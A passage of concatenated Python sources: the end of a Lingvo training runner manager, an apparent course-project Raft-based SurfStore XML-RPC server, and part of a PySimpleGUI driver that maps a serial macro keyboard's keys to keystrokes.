ps_cfg, model_cfg_dict = self.model_registry.GetProgramSchedule(
self._model_name, dataset_names)
for v in model_cfg_dict.values():
v.cluster = cluster.params
return ps_cfg, model_cfg_dict
def MaybeConfigRunDistributed(self):
"""If given a `FLAGS.cluster_spec`, update flags for running distributed."""
if not FLAGS.cluster_spec:
return
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = _GetClusterSpecDict()
if FLAGS.job == 'trainer_client':
FLAGS.tf_master = 'grpc://%s' % cluster_spec_dict['worker'][FLAGS.task]
for job in cluster_spec_dict.keys():
if job.startswith('decoder_'):
assert len(job_specs) == 1, 'Decoder jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.decoder_job = '/job:%s' % job
FLAGS.decoder_replicas = 1
if job.startswith('evaler_'):
assert len(job_specs) == 1, 'Evaler jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.evaler_job = '/job:%s' % job
FLAGS.evaler_replicas = 1
if FLAGS.mode == 'sync' and FLAGS.job in ('controller', 'trainer_client',
'worker', 'executor_tpu'):
FLAGS.worker_job = '/job:worker'
FLAGS.worker_replicas = len(cluster_spec_dict['worker'])
FLAGS.ps_job = '/job:worker'
FLAGS.ps_replicas = FLAGS.worker_replicas
if FLAGS.mode == 'async' and FLAGS.job in ('controller', 'trainer', 'ps'):
FLAGS.worker_job = '/job:trainer'
FLAGS.worker_replicas = len(cluster_spec_dict['trainer'])
FLAGS.ps_job = '/job:ps'
FLAGS.ps_replicas = len(cluster_spec_dict['ps'])
def MaybeConfigCloudTpu(self):
"""If given `FLAGS.tpu`, update flags for running on a Cloud TPU."""
if not FLAGS.tpu:
return
cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
tpu=FLAGS.tpu,
project=FLAGS.gcp_project,
zone=FLAGS.tpu_zone,
coordinator_name='trainer_client',
coordinator_address='localhost:0')
cluster_spec_dict = cluster_resolver.cluster_spec().as_dict()
FLAGS.job = 'trainer_client'
FLAGS.tf_master = cluster_resolver.master()
FLAGS.worker_job = '/job:worker'
FLAGS.worker_replicas = 1
FLAGS.worker_num_tpu_hosts = len(cluster_spec_dict['worker'])
FLAGS.worker_tpus = (
cluster_resolver.num_accelerators()['TPU'] * FLAGS.worker_num_tpu_hosts)
FLAGS.ps_job = FLAGS.worker_job
FLAGS.ps_replicas = FLAGS.worker_replicas
FLAGS.cluster_spec = ('@'.join(
'{}={}'.format(job, ','.join(hosts))
for job, hosts in cluster_spec_dict.iteritems()))
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
FLAGS.checkpoint_in_trainer_tpu = True
def UpdateClusterParamsFromFlags(self, cluster, job_name):
"""Update `cluster` with a training cluster configuration from flags."""
cluster.mode = FLAGS.mode
cluster.job = job_name
cluster.task = FLAGS.task
cluster.logdir = FLAGS.logdir
cluster.controller.name = FLAGS.controller_job
cluster.controller.gpus_per_replica = FLAGS.controller_gpus
cluster.worker.name = FLAGS.worker_job
cluster.worker.replicas = FLAGS.worker_replicas
cluster.worker.gpus_per_replica = FLAGS.worker_gpus
cluster.worker.tpus_per_replica = FLAGS.worker_tpus
cluster.worker.num_tpu_hosts = FLAGS.worker_num_tpu_hosts
cluster.worker.devices_per_split = FLAGS.worker_split_size
if FLAGS.tpu:
job_name = cluster.worker.name.replace('/job:', '', 1)
worker_hosts = _GetClusterSpecDict()[job_name]
cluster.worker.targets = ','.join(worker_hosts)
cluster.ps.name = FLAGS.ps_job
cluster.ps.replicas = FLAGS.ps_replicas
cluster.ps.gpus_per_replica = FLAGS.ps_gpus
cluster.input.name = FLAGS.input_job
cluster.input.replicas = FLAGS.input_replicas
cluster.input.targets = FLAGS.input_targets
cluster.evaler.name = FLAGS.evaler_job
cluster.evaler.replicas = FLAGS.evaler_replicas
cluster.evaler.gpus_per_replica = FLAGS.evaler_gpus
cluster.decoder.name = FLAGS.decoder_job
cluster.decoder.replicas = FLAGS.decoder_replicas
cluster.decoder.gpus_per_replica = FLAGS.decoder_gpus
def _CreateRunner(self, job, model_task_name, logdir, tf_master, trial):
"""Create a runner."""
evaler_job_name_prefix = 'evaler_'
decoder_job_name_prefix = 'decoder_'
tf.logging.info('Job %s start', job)
common_args = (model_task_name, logdir, tf_master, trial)
if job == 'controller':
cfg = self.GetParamsForDataset('controller', 'Train')
return self.Controller(cfg, *common_args)
elif job == 'trainer':
cfg = self.GetParamsForDataset('trainer', 'Train')
return self.Trainer(cfg, *common_args)
elif job == 'trainer_client':
cfg = self.GetParamsForDataset('trainer_client', 'Train')
if py_utils.use_tpu():
return self.TrainerTpu(cfg, *common_args)
else:
return self.Trainer(cfg, *common_args)
elif job.startswith(evaler_job_name_prefix):
dataset_name = job[len(evaler_job_name_prefix):]
cfg = self.GetParamsForDataset('evaler', dataset_name)
return self.Evaler(dataset_name.lower(), cfg, *common_args)
elif job.startswith(decoder_job_name_prefix):
dataset_name = job[len(decoder_job_name_prefix):]
cfg = self.GetParamsForDataset('decoder', dataset_name)
return self.Decoder(dataset_name.lower(), cfg, *common_args)
elif job in ('ps', 'worker', 'input'):
self._tf_server.join()
# TODO(blee): Fix the instantiation of ExecutorTpu
program_schedule, task_dict = self.GetProgramScheduleParams(
'executor_tpu', ['Train', 'Test'])
return self.ExecutorTpu(task_dict, program_schedule, model_task_name,
logdir, tf_master)
else:
raise ValueError('job %s is not supported' % job)
def CreateRunners(self, jobs, logdir, trial=base_trial.NoOpTrial()):
"""Creates a list of runners based on `FLAGS.mode`.
Args:
jobs: a list of runner jobs.
logdir: the directory used for logging, usually on CNS.
trial: optional `Trial` object, used for reporting measures and early
stopping.
Returns:
A list of `.BaseRunner`, one per job in `jobs`.
"""
runners = []
for j in jobs:
tf_master = FLAGS.tf_master
# Ensure that decoder or evaler threads do not clobber variables being
# updated by trainer by forcing them to use independent sessions.
if ('trainer' in jobs and
(j.startswith('decoder') or j.startswith('evaler'))):
tf_master = ''
runner = self._CreateRunner(j, FLAGS.model_task_name, logdir, tf_master,
trial)
runners.append(runner)
return runners
def StartRunners(self, runners):
"""Runs `runners` in parallel threads.
Returns when all of them finish.
Args:
runners: a list of `.BaseRunner`.
Returns:
None.
"""
threads = []
tf.logging.info('Starting runners')
for runner in runners:
t = threading.Thread(target=runner.Start)
t.daemon = True
t.start()
threads.append(t)
if runner.enqueue_ops:
tf.logging.info('Total num runner.enqueue_ops: %d',
len(runner.enqueue_ops))
for enqueue_op in runner.enqueue_ops:
def StartEnqueue(runner, op):
tf.logging.info('Starting enqueue op %s', op.name)
return lambda: runner.StartEnqueueOp(op)
tq = threading.Thread(target=StartEnqueue(runner, enqueue_op))
tq.start()
threads.append(tq)
tf.logging.info('Waiting for runners to finish...')
for t in threads:
while True:
t.join(1)
if not t.isAlive():
break
tf.logging.info('All runners done.')
def RunTrial(self, job, logdir, trial):
"""A wrapper function for running a trial."""
if job == 'all':
# For async mode: Run controller, trainer, evaler jobs in one process,
# multiple threads.
self.StartRunners(
self.CreateRunners(['controller', 'trainer'], logdir, trial))
evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir,
FLAGS.tf_master, trial)
evaler.EvalLatestCheckpoint()
elif job == 'all_sync':
# For sync mode: Run controller, trainer_client, evaler jobs in one
# process, multiple threads.
self.StartRunners(
self.CreateRunners(['controller', 'trainer_client'], logdir, trial))
evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir,
FLAGS.tf_master, trial)
evaler.EvalLatestCheckpoint()
else:
# Run each job in separate process/task
# TODO(rpang): add support for running evaler_test and decoder.
self.StartRunners(self.CreateRunners([job], logdir, trial))
def MaybeConfigRunLocally(self):
"""Update flags if configured to run locally."""
if not FLAGS.run_locally:
# Do nothing
return
FLAGS.tf_master = tf.train.Server.create_local_server().target
if not FLAGS.mode:
FLAGS.mode = 'sync'
if not FLAGS.job:
if FLAGS.run_locally == 'tpu':
FLAGS.job = 'trainer_client'
else:
FLAGS.job = 'controller,trainer_client'
FLAGS.task = 0
FLAGS.controller_job = '/job:local'
FLAGS.worker_job = '/job:local'
FLAGS.worker_replicas = 1
if FLAGS.run_locally == 'gpu':
if not FLAGS.worker_gpus:
FLAGS.worker_gpus = 1
else:
FLAGS.worker_gpus = 0
if FLAGS.run_locally == 'tpu':
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
else:
FLAGS.worker_tpus = 0
if not FLAGS.worker_split_size:
FLAGS.worker_split_size = 1
FLAGS.ps_job = '/job:local'
FLAGS.ps_replicas = 1
FLAGS.ps_gpus = 0
FLAGS.input_job = '/job:local'
FLAGS.input_replicas = 0
FLAGS.evaler_job = '/job:local'
FLAGS.evaler_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.evaler_gpus = 1
else:
FLAGS.evaler_gpus = 0
FLAGS.decoder_job = '/job:local'
FLAGS.decoder_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.decoder_gpus = 1
else:
FLAGS.decoder_gpus = 0
def InspectModel(self):
"""Prints out model analysis for the model."""
FLAGS.mode = 'sync'
p = self.GetParamsForDataset('controller', 'Train')
c = cluster_factory.Cluster(p.cluster)
with tf.Graph().as_default(), c, tf.device(c.GetPlacer()):
analysis, _ = _ModelAnalysis(p.Instantiate())
print(analysis)
def InspectDatasets(self):
"""Prints out datasets configured for the model."""
cls = self.model_registry.GetClass(self._model_name)
datasets = []
for name, _ in inspect.getmembers(cls, inspect.ismethod):
if name not in ['GetDatasetParams', 'Model', 'Task', 'ProgramSchedule'
] and not name.startswith('_'):
datasets += [name]
print(','.join([_.lower() for _ in datasets]))
def InspectDecoder(self):
"""Prints out datasets configured for the decoder."""
cls = self.model_registry.GetClass(self._model_name)
has_decoder = False
if issubclass(cls, base_model_params.SingleTaskModelParams):
has_decoder = cls.Task(
).cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics
else:
for _, task_param in cls.Model().task_params.IterParams():
has_decoder |= (
task_param.cls.CreateDecoderMetrics !=
base_model.BaseTask.CreateDecoderMetrics)
if has_decoder:
# We assume that the proper decoder is implemented.
self.InspectDatasets()
else:
print('')
def WriteInferenceGraph(self):
"""Generates the inference graphs for a given model."""
inference_graph_dir = os.path.join(FLAGS.logdir, 'inference_graphs')
tf.gfile.MakeDirs(inference_graph_dir)
tf.logging.info('Writing inference graphs to dir: %s', inference_graph_dir)
cfg = self.model_registry.GetParams(self._model_name, 'Test')
if (issubclass(cfg.cls, base_model.MultiTaskModel) and
not FLAGS.model_task_name):
tf.logging.info('Cannot write inference graphs for multi-task model '
'when model_task_name is not specified.')
return
try:
filename_prefix = 'inference'
if FLAGS.model_task_name:
filename_prefix = '%s_inference' % FLAGS.model_task_name
filename_prefix = os.path.join(inference_graph_dir, filename_prefix)
# Standard inference graph.
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=FLAGS.model_task_name,
export_path=filename_prefix + '.pbtxt')
except NotImplementedError as e:
tf.logging.error('Cannot write inference graph: %s', e)
# TPU inference graph. Not all models support it so fail silently.
try:
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=FLAGS.model_task_name,
device_options=self.inference_graph_exporter.InferenceDeviceOptions(
device='tpu',
retain_device_placement=False,
var_options='ON_DEVICE',
gen_init_op=True,
dtype_override=None),
export_path=filename_prefix + '_tpu.pbtxt')
except Exception as e: # pylint: disable=broad-except
tf.logging.info('Error exporting TPU inference graph: %s' % e)
def Start(self):
"""Start the process."""
tf.logging.set_verbosity(tf.logging.INFO)
assert self.model_registry.GetClass(
self._model_name), ('Model %s is not found.' % FLAGS.model)
if FLAGS.mode == 'inspect_model':
self.InspectModel()
return
if FLAGS.mode == 'inspect_evaler':
self.InspectDatasets()
return
if FLAGS.mode == 'inspect_decoder':
self.InspectDecoder()
return
if FLAGS.mode == 'write_inference_graph':
self.WriteInferenceGraph()
return
if FLAGS.mode == 'shell':
_StartShell(locals())
return
assert FLAGS.mode in ['sync', 'async']
self.MaybeConfigRunLocally()
self.MaybeConfigRunDistributed()
self.MaybeConfigCloudTpu()
self.MaybeLaunchTensorFlow()
self.StartRunners(self.CreateRunners(FLAGS.job.split(','), FLAGS.logdir))
def main(unused_argv):
# pylint: disable=g-import-not-at-top
# pylint: disable=unused-variable
from lingvo import model_imports
RunnerManager(FLAGS.model).Start()
if __name__ == '__main__':
tf.app.run(main)
|
server.py
|
import argparse
import sched
import xmlrpc.client
from hashlib import sha256
from random import randrange
from socketserver import ThreadingMixIn
from threading import Thread
from time import time, sleep
from xmlrpc.server import SimpleXMLRPCRequestHandler
from xmlrpc.server import SimpleXMLRPCServer
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)
class threadedXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
pass
FileInfoMap = {}
blocks = {}
serverNum = -1
servers = []
currentTerm = 0
votedFor = -1
log = []
commitIndex = -1
lastApplied = -1
matchIndex = []
FOLLOWER = 0
CANDIDATE = 1
LEADER = 2
CRASHED = 3
timer = 0
state = FOLLOWER
timeout = randrange(400, 700) / 1000
# A simple ping, returns true
def ping():
"""A simple ping method"""
print("Ping()")
return True
# Gets a block, given a specific hash value
def getblock(h):
"""Gets a block"""
print("GetBlock(" + h + ")")
if h in blocks:
blockData = blocks[h]
return blockData
else:
print("block not found")
# Puts a block
def putblock(b):
"""Puts a block"""
print("PutBlock()")
blocks[sha256(b.data).hexdigest()] = b
return True
# Given a list of blocks, return the subset that are on this server
def hasblocks(blocklist):
"""Determines which blocks are on this server"""
print("HasBlocks()")
return list(filter(lambda x: x in blocks, blocklist))
# Retrieves the server's FileInfoMap
def getfileinfomap():
"""Gets the fileinfo map"""
print("GetFileInfoMap()")
return FileInfoMap
def toFollower(term):
global currentTerm, state, timer, votedFor
state = FOLLOWER
currentTerm = term
votedFor = -1
timer = time()
def replicate(serverId, successes):
while successes[0] + 1 <= (len(servers) + 1) / 2:
if state == LEADER:
try:
term, success = servers[serverId].surfstore.appendEntries(currentTerm, log, commitIndex)
# print(serverId, log)
if success:
successes[0] += 1
matchIndex[serverId] = len(log) - 1
break
elif term != -1:
raise Exception('replicate failed')
if term > currentTerm:
toFollower(term)
except Exception as e:
print(str(e))
# Update a file's fileinfo entry
def updatefile(filename, version, blocklist):
global commitIndex
"""Updates a file's fileinfo entry"""
if state != LEADER or state == CRASHED:
raise Exception("not leader or crashed")
print("UpdateFile()")
if filename in FileInfoMap:
v = FileInfoMap[filename][0]
if blocklist == "0" and FileInfoMap[filename][1] == "0":
return v
elif version != v + 1:
print("version too old")
return False
successes = [0]
entry = (currentTerm, (filename, version, blocklist))
log.append(entry)
for i in range(len(servers)):
th = Thread(target=replicate, args=(i, successes))
th.start()
while successes[0] + 1 <= (len(servers) + 1) / 2:
if state == CRASHED:
return 0
commitIndex += 1
FileInfoMap[filename] = (version, blocklist)
sleep(0.5)
return version
# PROJECT 3 APIs below
# Queries whether this metadata store is a leader
# Note that this call should work even when the server is "crashed"
def isLeader():
"""Is this metadata store a leader?"""
print("IsLeader()")
return state == LEADER
# "Crashes" this metadata store
# Until Restore() is called, the server should reply to all RPCs
# with an error (unless indicated otherwise), and shouldn't send
# RPCs to other servers
def crash():
"""Crashes this metadata store"""
global state
print("Crash()")
state = CRASHED
return True
# "Restores" this metadata store, allowing it to start responding
# to and sending RPCs to other nodes
def restore():
"""Restores this metadata store"""
global state, timer
print("Restore()")
state = FOLLOWER
timer = time()
return True
# "IsCrashed" returns the status of this metadata node (crashed or not)
# This method should always work, even when the node is crashed
def isCrashed():
"""Returns whether this node is crashed or not"""
print("IsCrashed()")
return state == CRASHED
# Requests vote from this server to become the leader
def requestVote(term, candidateId, lastLogIndex, lastLogTerm):
"""Requests vote to be the leader"""
global timer, currentTerm, state, timer, votedFor
if state == CRASHED:
return -1, False
res = False
if currentTerm < term:
state = FOLLOWER
currentTerm = term
votedFor = -1
if currentTerm == term:
if (votedFor == -1 or votedFor == candidateId) and \
(not log or lastLogIndex >= len(log) - 1 and lastLogTerm >= log[-1][0]):
votedFor = candidateId
timer = time()
res = True
return currentTerm, res
def commit():
global lastApplied
# print('commit', lastApplied, commitIndex)
while lastApplied < commitIndex:
lastApplied += 1
_, (filename, version, blocklist) = log[lastApplied]
FileInfoMap[filename] = (version, blocklist)
# Updates fileinfomap
def appendEntries(term, entries, leaderCommit):
"""Updates fileinfomap to match that of the leader"""
if state == CRASHED:
return -1, False
global log, commitIndex, lastApplied, timer
res = False
print('appendEntries', leaderCommit, commitIndex, entries)
if term >= currentTerm:
if term > currentTerm:
toFollower(term)
else:
timer = time()
res = True
log = entries
if leaderCommit > commitIndex:
commitIndex = min(leaderCommit, len(log) - 1)
return currentTerm, res
def tester_getversion(filename):
return FileInfoMap[filename][0]
def getVote(serverId, votes):
global state, matchIndex
try:
term, voteGranted = servers[serverId].surfstore.requestVote(currentTerm, serverNum, len(log) - 1,
log[-1][0] if log else 0)
if state == CANDIDATE:
if voteGranted:
# prevent votes of previous election polluting current election
if term == currentTerm:
votes[0] += 1
if votes[0] + 1 > (len(servers) + 1) / 2:
state = LEADER
matchIndex = [-1] * len(servers)
else:
if term > currentTerm:
toFollower(term)
except Exception as e:
print(str(e))
def heartbeat(sc):
global commitIndex
if state == LEADER:
print('heartbeat', log, commitIndex)
for i, server in enumerate(servers):
try:
term, success = server.surfstore.appendEntries(currentTerm, log, commitIndex)
if success:
matchIndex[i] = len(log) - 1
elif term != -1:
raise Exception('heartbeat failed')
if term > currentTerm:
toFollower(term)
return
except Exception as e:
print(str(e))
N = commitIndex + 1
while (N < len(log) and log[N][0] == currentTerm and sum(i >= N for i in matchIndex) + 1 >
(len(servers) + 1) / 2):
N += 1
if commitIndex < N - 1:
commitIndex = N - 1
commit()
sc.enter(0.15, 1, heartbeat, (sc,))
# Reads the config file and return host, port and store list of other servers
def readconfig(config, servernum):
"""Reads cofig file"""
fd = open(config, 'r')
l = fd.readline()
maxnum = int(l.strip().split(' ')[1])
if servernum >= maxnum or servernum < 0:
raise Exception('Server number out of range.')
d = fd.read()
d = d.splitlines()
host = 0
port = 0
for i in range(len(d)):
hostport = d[i].strip().split(' ')[1]
if i == servernum:
host = hostport.split(':')[0]
port = int(hostport.split(':')[1])
else:
serverlist.append(hostport)
return maxnum, host, port
if __name__ == "__main__":
try:
parser = argparse.ArgumentParser(description="SurfStore server")
parser.add_argument('config', help='path to config file')
parser.add_argument('servernum', type=int, help='server number')
args = parser.parse_args()
config = args.config
servernum = args.servernum
# server list has list of other servers
serverlist = []
# config = 'config.txt'
# servernum = 2
# maxnum is maximum number of servers
maxnum, host, port = readconfig(config, servernum)
print("Attempting to start XML-RPC Server...")
print(host, port)
server = threadedXMLRPCServer((host, port), requestHandler=RequestHandler)
server.register_introspection_functions()
server.register_function(ping, "surfstore.ping")
server.register_function(getblock, "surfstore.getblock")
server.register_function(putblock, "surfstore.putblock")
server.register_function(hasblocks, "surfstore.hasblocks")
server.register_function(getfileinfomap, "surfstore.getfileinfomap")
server.register_function(updatefile, "surfstore.updatefile")
# Project 3 APIs
server.register_function(isLeader, "surfstore.isLeader")
server.register_function(crash, "surfstore.crash")
server.register_function(restore, "surfstore.restore")
server.register_function(isCrashed, "surfstore.isCrashed")
server.register_function(requestVote, "surfstore.requestVote")
server.register_function(appendEntries, "surfstore.appendEntries")
server.register_function(tester_getversion, "surfstore.tester_getversion")
for hostport in serverlist:
connection = xmlrpc.client.ServerProxy("http://" + hostport + '/RPC2', use_builtin_types=True)
servers.append(connection)
serverNum = servernum
timer = time()
def daemon():
global state, currentTerm, timer, votedFor
while True:
# print(state, currentTerm, timer)
# sleep(1)
if state != CRASHED:
commit()
if state == FOLLOWER:
if time() - timer > timeout:
state = CANDIDATE
elif state == CANDIDATE:
if time() - timer > timeout:
print('candidate timeout', timeout)
currentTerm += 1
timer = time()
votedFor = serverNum
votes = [0]
for i in range(len(servers)):
th = Thread(target=getVote, args=(i, votes))
th.start()
if state != CANDIDATE:
break
elif state == LEADER:
s = sched.scheduler(time, sleep)
s.enter(0, 1, heartbeat, (s,))
s.run()
p = Thread(target=daemon)
p.start()
print("Started successfully.")
print("Accepting requests. (Halt program to stop.)")
server.serve_forever()
except Exception as e:
print("Server: " + str(e))
|
main.py
|
import sys
import glob
import serial
from pymouse import PyMouse
from pykeyboard import PyKeyboard
import pymouse
import pykeyboard
import PySimpleGUI as sg
from configobj import ConfigObj
import configobj
import multiprocessing
from multiprocessing import Process, Value, Array
from queue import Queue
import queue
import time
import ctypes
import retrying
from retrying import retry
m = PyMouse()
k = PyKeyboard()
def newConf(Name):
config = ConfigObj("setting.ini",encoding='UTF8')
config[Name] = {}
config[Name]['K01'] = 'A'
config[Name]['K02'] = 'B'
config[Name]['K03'] = 'C'
config[Name]['K04'] = 'D'
config[Name]['K05'] = 'E'
config[Name]['K06'] = 'F'
config[Name]['K07'] = 'G'
config[Name]['K08'] = 'H'
config[Name]['K09'] = 'I'
config[Name]['K10'] = 'J'
config[Name]['K11'] = 'K'
config[Name]['K12'] = 'L'
config[Name]['EC1_Left'] = 'Z'
config[Name]['EC1_SW'] = 'X'
config[Name]['EC1_Right'] = 'C'
config[Name]['EC2_Left'] = 'V'
config[Name]['EC2_SW'] = 'B'
config[Name]['EC2_Right'] = 'N'
config.write()
def writeConf(Key, Cmd, List):
if isinstance(Key, list):
config = ConfigObj("setting.ini",encoding='UTF8')
for i in Key:
for j in Cmd:
config[List][i] = j
config.write()
if isinstance(Key, str):
config = ConfigObj("setting.ini",encoding='UTF8')
config[List][Key] = Cmd
config.write()
def readConf(List, Key=None):
if Key is None:
config = ConfigObj("setting.ini",encoding='UTF8')
Cmd = config[List]
else:
config = ConfigObj("setting.ini",encoding='UTF8')
Cmd = config[List][Key]
return Cmd # 返回值为CMD的Str或者CMD的字典
def readList(): # 获取全部配置名称
config = ConfigObj("setting.ini",encoding='UTF8')
List = config.keys()
return List # 返回值为一个列表包含全部配置名称
def delList(List):
config = ConfigObj("setting.ini",encoding='UTF8')
del config[List]
config.write()
def decodeList(Cmd): # 解码多按键
if "+" in Cmd:
decodeCmd = Cmd.split('+')
else:
decodeCmd = Cmd
return decodeCmd # 返回值要么为str要么为list
def checkList(Cmd): # 判断配置的按键是否为多按键
if "+" in Cmd:
return True # 多按键返回真
else:
return False # 单按键返回假
def choiceValue(callback, t):
decodeValue = callback[t]
return decodeValue
@retry(wait_fixed=5000)
def serial_ports():
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# 这不包括当前的终端"/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
if len(result) == 0:
s.close()
raise Exception # 结果为空抛出异常
s.close()
return result
def readLowPc(ser):
count = ser.inWaiting() # 获取串口缓冲区数据
recv = str(ser.readline()[0:-2].decode("utf8")) # 读出串口数据,数据采用utf8编码
return recv # 返回值为str
def readLowPcList(ser):
count = ser.inWaiting() # 获取串口缓冲区数据
recv = str(ser.readline()[0:-2].decode("utf8")) # 读出串口数据,数据采用utf8编码
return recv.split('_') # 返回值为list
def splitLowPcKey(key):
return key.split('_') # 返回值为list
def findDevice():
tty = serial_ports()
for devId in tty:
ser = serial.Serial(devId, 115200)
t = 0
while t < 12000:
print("查找次数:", t)
ser.write('Check'.encode("utf8")) # 发送Check命令
count = ser.inWaiting() # 获取串口缓冲区数据
t += 1
if count !=0 :
recv = str(ser.readline()[0:-2].decode("utf8")) # 读出串口数据,数据采用utf8编码
if recv == "this": # 检测下位机是否返回数据
ser.close()
return devId
break
def setKey(setKeyValue, newConfValue):
device = findDevice() # 查找下位机设备ID
print("找到的设备:", device)
ser = serial.Serial(device, 115200) # 初始化下位机读取
PdevKeys = {'A_P': 'K01', 'B_P': 'K02', 'C_P': 'K03', 'D_P': 'K04',
'E_P': 'K05', 'F_P': 'K06', 'G_P': 'K07', 'H_P': 'K08',
'I_P': 'K09', 'J_P': 'K10', 'K_P': 'K11', 'L_P': 'K12',
'SW1_P': 'EC1_SW', 'SW2_P': 'EC2_SW',
'D1_1': 'EC1_Left', 'D1_-1': 'EC1_Right',
'D2_1': 'EC2_Left', 'D2_-1': 'EC2_Right'} # 下位机按键按下的回报值字典
RdevKeys = {'A_R': 'K01', 'B_R': 'K02', 'C_R': 'K03', 'D_R': 'K04',
'E_R': 'K05', 'F_R': 'K06', 'G_R': 'K07', 'H_R': 'K08',
'I_R': 'K09', 'J_R': 'K10', 'K_R': 'K11', 'L_R': 'K12',
'SW1_R': 'EC1_SW', 'SW2_R': 'EC2_SW'} # 下位机按键松开的回报值字典
allList = readList() # 读取配置文件中的全部配置
nowConf = readConf(allList[setKeyValue.value]) # CMD的字典
while True:
if newConfValue.value == 1: # 当按下新建配置后重新读取配置文件中的全部配置
allList = readList()
nowConf = readConf(allList[setKeyValue.value]) # CMD的字典
newConfValue.value = 0
key = readLowPc(ser) # 读取下位机回报数据
for i in PdevKeys.keys():
if newConfValue.value == 1: # 当按下新建配置后重新读取配置文件中的全部配置
allList = readList()
nowConf = readConf(allList[setKeyValue.value]) # CMD的字典
newConfValue.value = 0
if key == i:
if checkList(nowConf[PdevKeys[i]]) is True: # 有加号
k.press_keys(decodeList(nowConf[PdevKeys[i]]))
elif checkList(nowConf[PdevKeys[i]]) is False: # 没有加号
if nowConf[PdevKeys[i]] == 'left':
m.scroll(1, 0)
elif nowConf[PdevKeys[i]] == 'right':
m.scroll(-1, 0)
elif nowConf[PdevKeys[i]] == 'up':
m.scroll(0, 1)
elif nowConf[PdevKeys[i]] == 'down':
m.scroll(0, -1)
else:
k.press_key(nowConf[PdevKeys[i]])
for i in RdevKeys.keys():
if newConfValue.value == 1: # 当按下新建配置后重新读取配置文件中的全部配置
allList = readList()
nowConf = readConf(allList[setKeyValue.value]) # CMD的字典
newConfValue.value = 0
if key == i:
if checkList(nowConf[RdevKeys[i]]) is False: # 没有加号
k.release_key(nowConf[RdevKeys[i]])
# 窗口持久化
def gui():
# 设置pysimplegui主题,不设置的话就用默认主题
sg.ChangeLookAndFeel('DarkAmber')
# 定义2个常量,供下面的layout直接调用,就不用一个个元素来调字体了
# 字体和字体大小
FONT1 = (16)
FONT2 = (20)
FONT3 = (30)
# 让下拉菜单内容填充为全部配置名称
Comobo = readList()
# 界面布局
layout = [
[sg.Text('EC1配置', font=(FONT2), size=(20, 1))],
[sg.Text('左转'), sg.InputText('<--', key='EC1_Left', size=(10, 5), font=(FONT1)), sg.Text('中键'), sg.InputText('SW', key='EC1_SW', size=(10, 5), font=(FONT1)), sg.Text('右转'), sg.InputText('-->', key='EC1_Right', size=(10, 5), font=(FONT1)), ],
[sg.Text('EC2配置', font=(FONT2), size=(20 ,1))],
[sg.Text('左转'), sg.InputText('<--', key='EC2_Left', size=(10, 5), font=(FONT1)), sg.Text('中键'), sg.InputText('SW', key='EC2_SW', size=(10, 5), font=(FONT1)), sg.Text('右转'), sg.InputText('-->', key='EC2_Right', size=(10, 5), font=(FONT1)), ],
[sg.HorizontalSeparator()],
[sg.Text('自定义按键配置', font=(FONT2))],
[sg.Text('K01'), sg.InputText('K01', key='K01', size=(10, 8), font=(FONT3)), sg.Text('K02'), sg.InputText('K02', key='K02', size=(10, 8), font=(FONT3)), sg.Text('K03'), sg.InputText('K03', key='K03', size=(10, 8), font=(FONT3)), sg.Text('K04'), sg.InputText('K04', key='K04', size=(10, 8), font=(FONT3)), ],
[sg.Text('K05'), sg.InputText('K05', key='K05', size=(10, 8), font=(FONT3)), sg.Text('K06'), sg.InputText('K06', key='K06', size=(10, 8), font=(FONT3)), sg.Text('K07'), sg.InputText('K07', key='K07', size=(10, 8), font=(FONT3)), sg.Text('K08'), sg.InputText('K08', key='K08', size=(10, 8), font=(FONT3)), ],
[sg.Text('K09'), sg.InputText('K09', key='K09', size=(10, 8), font=(FONT3)), sg.Text('K10'), sg.InputText('K10', key='K10', size=(10, 8), font=(FONT3)), sg.Text('K11'), sg.InputText('K11', key='K11', size=(10, 8), font=(FONT3)), sg.Text('K12'), sg.InputText('K12', key='K12', size=(10, 8), font=(FONT3)), ],
[sg.HorizontalSeparator()],
[sg.Combo(Comobo, size=(8, 1), font=(FONT2), key='_nowList', default_value="DEFAULT"), sg.Btn('新建配置', key='_newConf', font=(FONT2), size=(8, 1)), sg.Btn('删除配置', key='_delConf', font=(FONT2), size=(8, 1)), sg.Btn('读取配置', key='_readConf', font=(FONT2), size=(8, 1)), sg.Btn('保存配置', key='_saveConf', font=(FONT2), size=(8, 1)), sg.Btn('配置说明', key='_aboutConf', font=(FONT2), size=(8, 1)), sg.Btn('关于', key='_about', font=(FONT2), size=(8, 1))]
]
# 创建窗口,引入布局,并进行初始化
# 创建时,必须要有一个名称,这个名称会显示在窗口上
window = sg.Window('HotKeyKeyboard驱动程序', layout=layout, finalize=True)
# 创建一个事件循环,否则窗口运行一次就会被关闭
while True:
# 监控窗口情况
event, value = window.Read()
# 当获取到事件时,处理逻辑(按钮绑定事件,点击按钮即触发事件)
# sg.Input(),sg.Btn()都带有一个key,监控它们的状况,读取或写入信息
if event == '_newConf':
newConfName = sg.PopupGetText('配置名称') # 弹窗获取新建配置文件的名称
newConf(newConfName) # 向配置文件中添加新配置
Comobo = readList() # 获取现在配置文件中的全部配置(列表)
window.Element("_nowList").Update(value=newConfName, values=Comobo) # 更新下拉菜单
if event == '_readConf':
nowList = value['_nowList'] # 读GUI里的选配置下拉菜单的值
